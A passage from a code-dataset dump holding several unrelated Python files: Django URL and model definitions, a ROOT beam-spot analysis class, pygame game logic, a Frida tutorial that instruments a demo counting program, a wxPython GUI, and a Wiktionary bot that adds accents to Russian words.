older than: {} seconds.\"\n \"\".format(runtime.config['delete_record']))\n remove_document = deh_enabler_hub_obj.delete_local_db_records(query)\n\n def run(self):\n try:\n tl.start(block=True)\n except Exception as E:\n MetricsUpdater.__logger.warning(\"Exception Encountered during : {} \".format(E))\n pass\n\n\nif __name__ == \"__main__\":\n metrics_updater = MetricsUpdater()\n metrics_updater.run()\n \"\"\"\n with ThreadPoolExecutor() as executor:\n monitor = MetricsMonitor()\n mem_thread = executor.submit(monitor.measure_usage(resource))\n try:\n fn_thread = executor.submit(my_analysis_function)\n result = fn_thread.result()\n finally:\n monitor.keep_measuring = False\n max_usage = mem_thread.result()\n\n print(f\"Peak memory usage: {max_usage}\")\n \"\"\"","repo_name":"sundaresanrocks/DEHClien_Code","sub_path":"resource_monitor/metric_updater.py","file_name":"metric_updater.py","file_ext":"py","file_size_in_byte":34230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27138593093","text":"from django.conf.urls import include, url\nfrom oneverse_api import views\n\nurlpatterns = [\n url(r'^$', 'oneverse_api.views.oneverse_get_one_today'),\n url(r'^gcm/register/$', 'oneverse_api.gcm_views.save_user_gcm_registration_id'),\n url(r'^add/$', views.CreateVerseView.as_view()),\n url(r'^list/$', views.ListVerseView.as_view()),\n url(r'^update/(?P[0-9]+)/$', views.UpdateVerseView.as_view(),\n name=\"verse-detail\"),\n]\n","repo_name":"kensupernova/oneverse-web-app","sub_path":"oneverse_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"31646274578","text":"from rest_framework.routers import DefaultRouter\nfrom . 
import views\n\n\nrouter = DefaultRouter()\nrouter.APIRootView = views.NextBoxUIPluginRootView\n\nrouter.register(r'savedtopologies', views.SavedTopologyViewSet)\n\napp_name = \"nextbox_ui_plugin-api\"\nurlpatterns = router.urls\n","repo_name":"iDebugAll/nextbox-ui-plugin","sub_path":"nextbox_ui_plugin/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":430,"dataset":"github-code","pt":"40"} +{"seq_id":"27138593093","text":"import ROOT\nfrom ROOT import gROOT,TEllipse, TH1F, TH2F, TCanvas, TF1, TFile, TGraph, gApplication, TLegend\nimport math\n\n\n\n################################################\n## Class BeamSpot\n################################################\n\nclass BeamSpot:\n    def __init__(self,X=0,Y=0,XErr=0,YErr=0,XWidth=0,YWidth=0,XWidthErr=0,YWidthErr=0):\n        self.x = X\n        self.y = Y\n        self.xErr = XErr\n        self.yErr = YErr\n        self.xwidth = XWidth\n        self.ywidth = YWidth\n        self.xwidthErr = XWidthErr\n        self.ywidthErr = YWidthErr\n\n    #distance between the two beam spot centers\n    def Distance(self,beam):\n        return math.sqrt((self.x-beam.x)*(self.x-beam.x)+(self.y-beam.y)*(self.y-beam.y))\n\n    #return x-shift and the associated error\n    def XShift(self,beam):\n        return beam.x-self.x,math.sqrt(beam.xErr*beam.xErr+self.xErr*self.xErr)\n\n    #return y-shift and the associated error\n    def YShift(self,beam):\n        return beam.y-self.y,math.sqrt(beam.yErr*beam.yErr+self.yErr*self.yErr)\n\n    #multiple scattering: additional width increase\n    def xMSWidth(self,beam):\n        res = 0\n        if beam.xwidth>self.xwidth: res = math.sqrt(beam.xwidth*beam.xwidth-self.xwidth*self.xwidth)\n        else: res = math.sqrt(-beam.xwidth*beam.xwidth+self.xwidth*self.xwidth)\n        error = math.sqrt(beam.xwidthErr*beam.xwidthErr+self.xwidthErr*self.xwidthErr)\n        return res,error\n\n    #multiple scattering: additional width increase\n    def yMSWidth(self,beam):\n        res = 0\n        if beam.ywidth>self.ywidth: res = math.sqrt(beam.ywidth*beam.ywidth-self.ywidth*self.ywidth)\n        else: res = math.sqrt(self.ywidth*self.ywidth-beam.ywidth*beam.ywidth)\n        error = math.sqrt(beam.ywidthErr*beam.ywidthErr+self.ywidthErr*self.ywidthErr)\n        return res, error\n\n    def GetStr(self,withErr=False):\n        output = \"Center ( %0.1f\"%self.x\n        if withErr: output+=\" +/- %0.1f\"%self.xErr\n        output+=\" , %0.1f\"%self.y\n        if withErr: output+=\" +/- %0.1f\"%self.yErr\n        output+=\" )\"\n        output+=\" Widths ( %0.1f\"%self.xwidth\n        if withErr: output+=\" +/- %0.1f\"%self.xwidthErr\n        output+=\" , %0.1f\"%self.ywidth\n        if withErr: output+=\" +/- %0.1f\"%self.ywidthErr\n        output+=\" )\"\n        return output\n\n    def GetCSVHead(self):\n        output = \"x,xErr,y,yErr,xwidth,xwidthErr,ywidth,ywidthErr\"\n        return output\n\n    def GetCSV(self):\n        output = \"%0.1f\"%self.x\n        output+=\",%0.1f\"%self.xErr\n        output+=\",%0.1f\"%self.y\n        output+=\",%0.1f\"%self.yErr\n        output+=\",%0.1f\"%self.xwidth\n        output+=\",%0.1f\"%self.xwidthErr\n        output+=\",%0.1f\"%self.ywidth\n        output+=\",%0.1f\"%self.ywidthErr\n        return output\n\n    def LoadCSV(self, info):\n        if len(info.split(','))<8:\n            return None\n        values = info.split(',')\n        #columns follow GetCSVHead(): x,xErr,y,yErr,xwidth,xwidthErr,ywidth,ywidthErr\n        self.x = float(values[0])\n        self.xErr = float(values[1])\n        self.y = float(values[2])\n        self.yErr = float(values[3])\n        self.xwidth = float(values[4])\n        self.xwidthErr = float(values[5])\n        self.ywidth = float(values[6])\n        self.ywidthErr = float(values[7])\n\n    def Print(self,withErr=False):\n        print(self.GetStr(withErr))\n\n    
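# A short usage sketch (hypothetical values, not from the original file):\n    # the CSV helpers round-trip a beam spot, with columns in GetCSVHead() order.\n    #   bs = BeamSpot(X=1.2, Y=3.4, XWidth=0.5, YWidth=0.6)\n    #   line = bs.GetCSV()   # -> 1.2,0.0,3.4,0.0,0.5,0.0,0.6,0.0\n    #   bs2 = BeamSpot()\n    #   bs2.LoadCSV(line)    # restores the same center and widths\n    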
def GetEllipseCenter(self,color=1,width=1,linestyle=1,fillstyle=0):\n el = TEllipse(self.x,self.y,self.xErr,self.yErr)\n el.SetLineColor(color)\n el.SetFillColor(color)\n el.SetLineWidth(width)\n el.SetLineStyle(linestyle)\n el.SetFillStyle(fillstyle)\n return el\n\n\n","repo_name":"echabert/pySitrineoAna","sub_path":"base/BeamSpot.py","file_name":"BeamSpot.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17595003180","text":"import pygame, sys, classes, random\n\ndef process(player, FPS, total_frames):\n\n\t#processing\n\tfor event in pygame.event.get(): #This is a list of all possible that can happen within the pygame framework. Loops through them\n\t\tif event.type == pygame.QUIT:#if the type of event is that the program wants to quit,\n\t\t\t\n\t\t\tpygame.quit()#closes pygame\n\t\t\tsys.exit()#system closes properly and allows the program to terminate\n\n\t\tif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_e:\n\t\t\t\tclasses.PlayerProjectile.freeze = not classes.PlayerProjectile.freeze\n\n\n\tkeys = pygame.key.get_pressed()\n\n\t#Sets the a and d keys to move the image a moves left\n\t#d moves the image right when w is pressed it goes up and when \n\t#x is pressed the image moves down\n\tif keys[pygame.K_d]:\n\t\tclasses.Player.going_right = True\n\t\tplayer.image = pygame.image.load(\"images/player1.png\")\n\t\tplayer.velx = 5\n\n\telif keys[pygame.K_a]:\n\t\tclasses.Player.going_right = False\n\t\tplayer.image = pygame.image.load(\"images/player1flip.png\")\n\t\tplayer.velx = -5\n\telse:\n\t\tplayer.velx = 0\t\n\n\tif keys[pygame.K_w]:\n\t\tplayer.vely = -5\n\n\telif keys[pygame.K_x]:\n\t\tplayer.vely = 5\n\n\telse:\n\t\tplayer.vely = 0\n\n\t\n\n\n\tif keys[pygame.K_SPACE]:\n\n\n\t\tdef direction():\n\t\t\tif classes.Player.going_right:\n\t\t\t\tp.velx = 8\n\t\t\telse:\n\t\t\t\tp.image = pygame.transform.flip(p.image, True, False)#flips the image when shooting the other direction\n\t\t\t\tp.velx = -8\n\t\tif (classes.PlayerProjectile.freeze):\n\t\t\tp = classes.PlayerProjectile(player.rect.x, player.rect.y, True, \"images/projectiles/snowball1.png\")\n\t\t\tdirection()\n\t\telse:\n\t\t\tp = classes.PlayerProjectile(player.rect.x, player.rect.y, False, \"images/projectiles/snowballFace.png\")\n\t\t\tdirection()\n\n\t\n\t#classes.Enemies(640 - 40, 130, 26, 40, \"images/enemie1flip.png\")\n\tspawn(FPS, total_frames) #calls the enemie so it spawns a new one according to the time.\n\tcollisions()\n\n\t#Creates enemies \ndef spawn(FPS, total_frames):\n\n\tsixty_seconds = FPS * 15 #spaws a new enemy every sixty seconds\n\n\tif total_frames % sixty_seconds == 0:\n\n\t\n\t\tr = random.randint(1,2)\n\t\tx = 1\n\t\tif r == 2:\n\t\t\tx = 640 - 40\n\t\tclasses.Enemies(x, 130, \"images/enemie1.png\")\n\ndef collisions():\n\n\t#Freeze enemies\n\t#widthpx projectiles\n\n\n\t#pygame.sprite.groupcollide(G1, G2, dokill, dokill) # this takes the first group(G1) and second group(G2) and when they collide it asks if you want to remove the first one (dokill) and do you want to remove the second one (dokill). 
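\n\t# For example, a hypothetical call for this game would be:\n\t#   hits = pygame.sprite.groupcollide(classes.PlayerProjectile.List, classes.Enemies.List, True, False)\n\t# which removes every colliding projectile, keeps the enemies alive and\n\t# returns a dict mapping each projectile to the enemies it hit.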
\n\t# for enemies in classes.Enemies.List:\n\t# # \tenemies_proj = pygame.sprite.spritecollide(enemies, classes.PlayerProjectile.List, True)\t\n\t# # \tif len(enemies_proj) > 0:\n\t# # \t\tfor hit in enemies_proj:\n\t# # \t\t\tenemies.health -= enemies.half_health\n\n\t# \tif pygame.sprite.spritecollide(enemies, classes.PlayerProjectile.List, False):\n\n\t# \t\tif classes.PlayerProjectile.freeze:\n\t# \t\t\tenemies.health -= enemies.half_health\n\t# \t\telse:\n\t# \t\t\tenemies.velx = 0\n\t# \t\t\t# enemies.image = \"some image\" put something here if I find a good frozen pic for the enemie\n\n\t# for proj in classes.PlayerProjectile.List:\n\n\t# \tif pygame.sprite.spritecollide(proj, classes.Enemies.List, False):\n\n\t# \t\tproj.rect.x = 2 * -proj.rect.width\n\t# \t\tproj.destroy()\n\n\tfor enemies in classes.Enemies.List:\n\n\t\tprojectiles = pygame.sprite.spritecollide(enemies, classes.PlayerProjectile.List, True) # when a player projectile collides with a enemy it returns the projectiles in the projectiles list\n\n\t\tfor projectile in projectiles:\n\n\n\t\t\tenemies.health = 0\n\t\t\n\t\t\tif projectile.if_this_variable_is_true_then_freeze:\n\n\t\t\t\tenemies.image = image = pygame.image.load(\"images/snowman2.png\") # regular snowball\n\n\t\t\telse:\n\n\t\t\t\tif enemies.velx > 0: # is dead\n\t\t\t\t\tenemies.velx = 0 # enemies is now paralysed\n\t\t\t\t\tenemies.image = pygame.image.load(\"images/snowman3.png\") # freeze snowball\n\t\t\t\telif enemies.velx < 0:\n\t\t\t\t\tenemies.image = pygame.image.load(\"images/snowman3.png\")\n\t\t\t\t\tenemies.image = pygame.transform.flip(enemies.image, True, False)\n\n\t\t\tprojectile.rect.x = 2 * -projectile.rect.width\n\t\t\tprojectile.destroy()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Pettythug/ForThisClass","sub_path":"ClassProjectGame/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18642357368","text":"# Archive of Reversing.ID\r\n# Frida Compendium - Windows Basic\r\n#\r\n# Send and receive data to and from instrumented process.\r\n# Blocking operation.\r\n#\r\n# Run: python blocking-recv.py
\r\nimport frida\r\nimport sys\r\n\r\n# Use this script to inject the following JS file into the target\r\n\r\n# Target: count.exe\r\n# - blocking-recv.js\r\n\r\nTARGET_APP = \"count32.exe\"\r\nscript = None\r\n\r\n\r\ndef on_message(message, data):\r\n    print(message)\r\n    val = int(message['payload'])\r\n    script.post( { 'type':'input', 'payload':str(val * 2) } )\r\n\r\n\r\ndef load_script(script_name):\r\n    # Read the instrumentation script from disk\r\n    with open(script_name) as f:\r\n        script = f.read()\r\n    return script\r\n\r\n\r\ndef main():\r\n    # Refuse to run if the target address argument is missing\r\n    if len(sys.argv) < 2:\r\n        print(\"Usage: python script.py
    \")\r\n sys.exit(0)\r\n\r\n # Parse the arguments\r\n addr = int(sys.argv[1], 16) # Address is in hex form\r\n\r\n # Attach on running process\r\n session = frida.attach(TARGET_APP)\r\n\r\n # Instrumentation script \r\n # Using Interceptor to attach to a function\r\n # Here we are inside a function\r\n global script\r\n jscode = load_script(\"blocking-recv.js\")\r\n script = session.create_script(jscode % (addr))\r\n\r\n # Set a callback, when frida is sending a string, we print it out\r\n script.on('message', on_message)\r\n\r\n # Load the script\r\n script.load()\r\n\r\n script.post( { 'magic' : 135 } )\r\n script.post( { 'magic' : 135 } )\r\n\r\n # Delay\r\n # Execution is happened on other process so we need to make our script \r\n # running all the way to the end\r\n input(\"[!] Press at any time to detach from instrumented program.\\n\\n\")\r\n session.detach()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n ","repo_name":"ReversingID/Frida-Compendium","sub_path":"Learn/Basics/windows/3.communication/3.blocking-recv.py","file_name":"3.blocking-recv.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"30741512003","text":"#!/usr/bin/python\n\nimport wx\nimport datetime\nimport collections\nimport string\nimport logging\nfrom utilities.symbols import Symbols\n\nfrom database import db_connection\n\nclass MainApplicationWindow(wx.Frame):\n\tdef __init__(self, parent = None, title=\"Stock Analysis User Interface\"):\n\t\twx.Frame.__init__(self, parent, title = title, size=(1200,800))\n\t\t\n\t\tself.symbols = Symbols()\n\t\tself.symbols.initialise()\n\t\t\n\n\t\t# Status bar at the bottom\n\t\tself.CreateStatusBar()\n\t\t#Memn\n\t\tmenubar = wx.MenuBar()\n\t\tfile_menu = wx.Menu()\n\t\tfile_menu.Append(22, '&Quit', 'Exit Stock GUI')\n\t\tmenubar.Append(file_menu, '&File')\n\t\tself.SetMenuBar(menubar)\n\t\twx.EVT_MENU(self, 22, self.OnClose)\n\n\t\t#Panels\n\t\tmenu_panel = wx.Panel(self, -1)\n\t\t#Sizer\n\t\t#sizer = wx.GridSizer(8,1)\n\t\tv_menu_box_sizer = wx.BoxSizer(wx.VERTICAL)\n\t\th_menu_box_sizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\t#Create element\n\t\tsymbol_label = wx.StaticText(menu_panel, -1, \"Symbols\", size=(140,20),style=wx.ALIGN_RIGHT)\n\t\tsymbols = wx.ComboBox(menu_panel, -1, size=(140,20),choices = self.symbols.get_symbols_list(), style=wx.CB_READONLY)\n\t\t#Add element\n\t\tv_menu_box_sizer.Add(symbol_label)\n\t\tv_menu_box_sizer.Add(symbols)\n\n\t\th_menu_box_sizer.Add(v_menu_box_sizer, 1, wx.EXPAND)\n\t\t#Add panels\n\t\tmenu_panel.SetSizer(h_menu_box_sizer)\n\t\t#Show Everything (last action)\n\t\tself.Show()\n\t\tpass #__init__ functions\n\n\tdef __del__(self):\n\t\tself.symbols.shutdown()\n\n\tdef OnClose(self, event):\n\t\tself.Close()\n","repo_name":"losowski/trading","sub_path":"pythonOLD/gui/main_application.py","file_name":"main_application.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16402450776","text":"from typing import Iterable, Optional\nfrom django.db import models\nfrom django.utils.text import slugify\nfrom authentication.models import CustomUser\n\nclass BaseModel(models.Model):\n created = models.DateField(auto_now_add=True)\n updated = models.DateField(auto_now=True)\n\n class Meta:\n abstract = True\n\nclass Catigory(models.Model):\n title = models.CharField(max_length=255)\n slug = models.SlugField(max_length=255, 
blank=True, null=True)\n \n def save(self, *args, **kwargs) -> None:\n if not self.slug:\n self.slug = slugify(self.title)\n super(Catigory, self).save(*args, **kwargs)\n\n def __str__(self) -> str:\n return self.title \n\nclass Product(models.Model):\n title = models.CharField(max_length=255)\n slug = models.SlugField(max_length=255, blank=True)\n description = models.TextField(null=True)\n quantity = models.PositiveBigIntegerField(default=0)\n category = models.ForeignKey(to=Catigory, on_delete=models.CASCADE, related_name=\"products\")\n image = models.ImageField(upload_to=\"products/%Y/%m/%d/\", null=True, blank=True)\n price = models.DecimalField(max_digits=12, decimal_places=2)\n\n created = models.DateField(auto_now_add=True)\n updated = models.DateField(auto_now=True)\n\n def save(self, *args, **kwargs) -> None:\n if not self.slug:\n self.slug = slugify(self.title)\n super(Product, self).save(*args, **kwargs)\n\n def __str__(self) -> str:\n return self.title + \" Catigory_id - \" + str(self.category)\n \n\nclass Order(BaseModel):\n NEW = 'new'\n CONFIRMED = 'confirmed'\n CANCELED = 'canceled'\n\n ORDER_STATUS = (\n (NEW, 'New'),\n (CONFIRMED, 'Confirmed'),\n (CANCELED, 'Canceled')\n )\n\n user = models.ForeignKey(CustomUser, on_delete=models.CASCADE, related_name='orders')\n total_price = models.DecimalField(decimal_places=2, max_digits=12)\n status = models.CharField(choices=ORDER_STATUS, default=NEW, max_length=50)\n paid = models.BooleanField(default=False)\n\nclass OrderProduct(BaseModel):\n order = models.ForeignKey(Order, on_delete=models.CASCADE, related_name=\"products\")\n product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name=\"order_products\")\n quantity = models.PositiveBigIntegerField()\n\n def update_quantity(self):\n self.product.quantity -= self.quantity\n self.product.save()\n\n def save(self, *args, **kwargs) -> None:\n if not self.pk:\n self.update_quantity() \n super(OrderProduct, self).save( *args, **kwargs)","repo_name":"SultanO12/Django-Website","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3371972499","text":"#!/usr/bin/env python\n#coding: utf-8\n\n# find_russian_need_vowels.py is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n# Despite its name, this is actually a script to auto-accent Russian text\n# by looking up unaccented multisyllabic words in the dictionary and fetching\n# the accented headwords, and if there's only one, using it in place of the\n# original unaccented word. We're somewhat smarter than this, e.g. we first\n# try looking up the whole phrase before partitioning it into individual\n# words.\n#\n# FIXME:\n#\n# 1. (DONE AS PART OF SMARTER WORD SPLITTING) Handle '''FOO''', matched up\n# against blank tr, TR or '''TR'''. Cf. '''спасти''' in 23865 спасти.\n# 2. 
(DONE) Handle multiword expressions *inside* of find_accented so we\n# can handle e.g. the multiword linked expressions in 24195 стан, such\n# as [[нотный стан]] and [[передвижной полевой стан]].\n# 3. (DONE) Handle single-word two-part links [[FOO|BAR]].\n# 4. Consider implementing support for [[FOO BAR]] [[BAZ]]. To do this\n# we need to keep [[FOO BAR]] together when word-splitting. We can\n# do this by splitting on the expression we want to keep together,\n# with a capturing split, something like \"(\\[\\[.*?\\]\\]|[^ ,.!?\\-]+)\".\n# It's tricky to handle treating ''' as punctuation when doing this,\n# and even trickier if there is manual translit; probably in the latter\n# case we just want to refuse to do it.\n# 5. (DONE) When splitting on spaces, don't split on hyphens at first, but\n# then split on hyphens the second time around.\n# 6. (DONE) Implement a cache in find_accented_2().\n# 7. (DONE, NO, ACCENTED TEXT CAN'T BE PUT INTO WIKIPEDIA PAGE LINKS)\n# Should probably skip {{wikipedia|lang=ru|...}} links. First check\n# whether accented text can even be put into the page link.\n# 8. (DONE) Skip {{temp|head}}.\n# 9. (DONE) Don't try to accent multisyllable particles that should be\n# accentless (либо, нибудь, надо, обо, ото, перед, передо, подо, предо,\n# через).\n# 10. (DONE) Message \"changed from ... in more than just accents\": Handle\n# grave accent on е and и, handle case where accented text ends with extra\n# ! or ?.\n# 11. (DONE) Turn off splitting of templates on translit with comma in it.\n# 12. (DONE) When doing word splitting and looking up individual words,\n# if the lookup result has a comma in translit, chop off everything\n# after the comma and issue a warning. Occurs e.g. in 6661 детектив,\n# with {{l|ru|частный детектив}}. (FIXME: Even better would be to\n# duplicate the entire translit.)\n# 13. (DONE) When fetching the result of ru-noun+, if there are multiple\n# lemmas, combine the ones with the same Russian by separating the translits\n# with a comma. Occurs e.g. in 6810 динамика with {{l|ru|термодинамика}}.\n# 14. If we repeat this script, we should handle words that occur directly\n# after a stressed monosyllabic preposition and not auto-acent them.\n# The list of such prepositions is без, близ, во, да, до, за, из, ко,\n# меж, на, над, не, ни, об, от, по, под, пред, при, про, со, у. I don't\n# think multisyllabic unstressed prepositions can steal accent from a\n# following word; need to ask Anatoli/Wikitiki89 about this.\n\nimport re, codecs\n\nimport blib, pywikibot\nfrom blib import msg, getparam, addparam\nimport rulib as ru\n\nsite = pywikibot.Site()\nsemi_verbose = False # Set by --semi-verbose or --verbose\n\n# List of accentless multisyllabic words. FIXME: We include было because of\n# the expression не́ было, but we should maybe check for this expression\n# rather than never accenting было.\naccentless_multisyllable = [u\"либо\", u\"нибудь\", u\"надо\", u\"обо\", u\"ото\",\n u\"перед\", u\"передо\", u\"подо\", u\"предо\", u\"через\", u\"было\"]\n\nru_head_templates = [\"ru-noun\", \"ru-proper noun\", \"ru-verb\", \"ru-adj\", \"ru-adv\",\n \"ru-phrase\", \"ru-noun form\"]\n\n# List of heads found during lookup of a page. Value is None if the page\n# doesn't exist. 
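\n# (Illustration with made-up pagenames:\n#   accented_cache[u\"пример\"] = None          # page does not exist\n#   accented_cache[u\"образец\"] = \"redirect\"   # page is a redirect\n# and otherwise:)\n# 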
Value is the string \"redirect\" if page is a redirect.\n# Otherwise, value is a tuple (HEADS, SAW_HEAD) where HEADS is all heads\n# found on the page, and SAW_HEAD is True if we saw any headword templates\n# on the page (we might have found headword templates but no heads, e.g.\n# in a template call like {{ru-phrase}}).\naccented_cache = {}\nnum_cache_lookups = 0\nnum_cache_hits = 0\nglobal_disable_cache = False\n\ndef output_stats(pagemsg):\n if global_disable_cache:\n return\n pagemsg(\"Cache size = %s\" % len(accented_cache))\n pagemsg(\"Cache lookups = %s, hits = %s, %0.2f%% hit rate\" % (\n num_cache_lookups, num_cache_hits,\n float(num_cache_hits)*100/num_cache_lookups if num_cache_lookups else 0.0))\n\ndef split_ru_tr(form):\n if \"//\" in form:\n rutr = re.split(\"//\", form)\n assert len(rutr) == 2\n ru, tr = rutr\n return (ru, tr)\n else:\n return (form, \"\")\n\n# Look up a single term (which may be multi-word); if the page exists,\n# retrieve the headword(s), and if there's only one, return its\n# (presumably accented) text and any manual translit; otherwise, return\n# the term and translit passed in.\ndef find_accented_2(term, termtr, verbose, pagemsg):\n if term in accentless_multisyllable:\n pagemsg(\"Not accenting unaccented multisyllabic particle %s\" % term)\n return term, termtr\n # This can happen if e.g. we're passed \"[[FOO|BAR]] BAZ\"; we will reject it,\n # but it will then be word-split and handled correctly (\"[[FOO|BAR]]\" is\n # special-cased in find_accented_1()).\n if \"|\" in term:\n #pagemsg(\"Can't handle links with vertical bars: %s\" % term)\n return term, termtr\n # This can happen if e.g. we're passed \"[[FOO]] [[BAR]]\"; we will reject it,\n # but it will then be word-split and handled correctly (\"[[FOO]]\" is\n # special-cased in find_accented_1()).\n if \"[\" in term or \"]\" in term:\n #pagemsg(\"Can't handle stray bracket in %s\" % term)\n return term, termtr\n if \"<\" in term or \">\" in term:\n pagemsg(\"Can't handle stray < or >: %s\" % term)\n return term, termtr\n if u\"\\u0301\" in term or u\"ё\" in term:\n pagemsg(u\"Term has accent or ё, not looking up accents: %s\" % term)\n return term, termtr\n if ru.is_monosyllabic(term):\n pagemsg(\"Term is monosyllabic, not looking up accents: %s\" % term)\n return term, termtr\n pagename = ru.remove_accents(term)\n # We can't use expand_text() from find_accented_1() because it has a\n # different value for PAGENAME, and the proper value is important in\n # expanding ru-noun+ and ru-proper noun+.\n def expand_text(tempcall):\n return blib.expand_text(tempcall, pagename, pagemsg, semi_verbose)\n\n # Look up the page\n if semi_verbose:\n pagemsg(\"find_accented: Finding heads on page %s\" % pagename)\n\n cached_redirect = False\n global num_cache_lookups\n num_cache_lookups += 1\n if pagename in accented_cache:\n global num_cache_hits\n num_cache_hits += 1\n result = accented_cache[pagename]\n cached = True\n if result is None:\n if semi_verbose:\n pagemsg(\"find_accented: Page %s doesn't exist (cached)\" % pagename)\n return term, termtr\n elif result == \"redirect\":\n cached_redirect = True\n heads = set()\n saw_head = False\n else:\n heads, saw_head = result\n else:\n cached = False\n page = pywikibot.Page(site, pagename)\n try:\n if not page.exists():\n if semi_verbose:\n pagemsg(\"find_accented: Page %s doesn't exist\" % pagename)\n if not global_disable_cache:\n accented_cache[pagename] = None\n return term, termtr\n except Exception as e:\n pagemsg(\"WARNING: Error checking page existence: 
%s\" % unicode(e))\n if not global_disable_cache:\n accented_cache[pagename] = None\n return term, termtr\n\n # Page exists, find the heads\n heads = set()\n def add(val, tr):\n val_to_add = blib.remove_links(val)\n if val_to_add:\n heads.add((val_to_add, tr))\n saw_head = False\n for t in blib.parse(page).filter_templates():\n tname = unicode(t.name)\n if tname in ru_head_templates:\n saw_head = True\n if getparam(t, \"1\"):\n add(getparam(t, \"1\"), getparam(t, \"tr\"))\n elif getparam(t, \"head\"):\n add(getparam(t, \"head\"), getparam(t, \"tr\"))\n elif tname == \"head\" and getparam(t, \"1\") == \"ru\":\n saw_head = True\n add(getparam(t, \"head\"), getparam(t, \"tr\"))\n elif tname in [\"ru-noun+\", \"ru-proper noun+\"]:\n saw_head = True\n lemma = ru.fetch_noun_lemma(t, expand_text)\n lemmas = re.split(\",\", lemma)\n lemmas = [split_ru_tr(lemma) for lemma in lemmas]\n # Group lemmas by Russian, to group multiple translits\n lemmas = ru.group_translits(lemmas, pagemsg, expand_text)\n for val, tr in lemmas:\n add(val, tr)\n if saw_head:\n for i in xrange(2, 10):\n headn = getparam(t, \"head\" + str(i))\n if headn:\n add(headn, getparam(t, \"tr\" + str(i)))\n if not global_disable_cache:\n accented_cache[pagename] = (heads, saw_head)\n\n # We have the heads\n cached_msg = \" (cached)\" if cached else \"\"\n if len(heads) == 0:\n if not saw_head:\n if cached_redirect:\n pagemsg(\"Redirect without heads (cached)\")\n elif not cached and re.match(\"#redirect\", page.text, re.I):\n if not global_disable_cache:\n accented_cache[pagename] = \"redirect\"\n pagemsg(\"Redirect without heads\")\n else:\n pagemsg(\"WARNING: Can't find any heads: %s%s\" % (pagename, cached_msg))\n return term, termtr\n if len(heads) > 1:\n pagemsg(\"WARNING: Found multiple heads for %s%s: %s\" % (pagename, cached_msg, \",\".join(\"%s%s\" % (ru, \"//%s\" % tr if tr else \"\") for ru, tr in heads)))\n return term, termtr\n newterm, newtr = list(heads)[0]\n if semi_verbose:\n pagemsg(\"find_accented: Found head %s%s%s\" % (newterm, \"//%s\" % newtr if newtr else \"\", cached_msg))\n if re.search(\"[!?]$\", newterm) and not re.search(\"[!?]$\", term):\n newterm_wo_punc = re.sub(\"[!?]$\", \"\", newterm)\n if ru.remove_accents(newterm_wo_punc) == ru.remove_accents(term):\n pagemsg(\"Removing punctuation from %s when matching against %s\" % (\n newterm, term))\n newterm = newterm_wo_punc\n if ru.remove_accents(newterm) != ru.remove_accents(term):\n pagemsg(\"WARNING: Accented term %s differs from %s in more than just accents%s\" % (\n newterm, term, cached_msg))\n return newterm, newtr\n\n# After the words in TERM with translit TERMTR have been split into words\n# WORDS and TRWORDS (which should be an empty list if TERMTR is empty), with\n# alternating separators in the odd-numbered words, find accents for each\n# individual word and then rejoin the result.\ndef find_accented_split_words(term, termtr, words, trwords, verbose, pagemsg,\n expand_text, origt):\n newterm = term\n newtr = termtr\n # Check for \"unbalanced\" brackets. 
Can happen if the text is e.g.\n # [[торго́вец]] [[произведение искусства|произведе́ниями иску́сства]]\n # with multiple words inside a bracket -- not really unbalanced\n # but tricky to handle properly.\n unbalanced = False\n for i in xrange(0, len(words), 2):\n word = words[i]\n if word.count(\"[\") != word.count(\"]\"):\n pagemsg(\"WARNING: Unbalanced brackets in word #%s %s: %s\" %\n (i//2, word, \"\".join(words)))\n unbalanced = True\n break\n if not unbalanced:\n newwords = []\n newtrwords = []\n # If we end up with any words with manual translit (either because\n # translit was already supplied by the existing template and we\n # preserve the translit for a given word, or because we encounter\n # manual translit when looking up a word), we will need to manually\n # transliterate all remaining words. Note, even when the existing\n # template supplies manual translit, we may need to manually\n # translit some words, because the lookup of those words may\n # (in fact, usually will) return a result without manual translit.\n sawtr = False\n # Go through each word and separator.\n for i in xrange(len(words)):\n word = words[i]\n trword = trwords[i] if trwords else \"\"\n if i % 2 == 0:\n # If it's a word (not a separator), look it up.\n ru, tr = find_accented(word, trword, verbose, pagemsg, expand_text,\n origt)\n if tr and \",\" in tr:\n chopped_tr = re.sub(\",.*\", \"\", tr)\n pagemsg(\"WARNING: Comma in translit <%s>, chopping off text after the comma to <%s>\" % (\n tr, 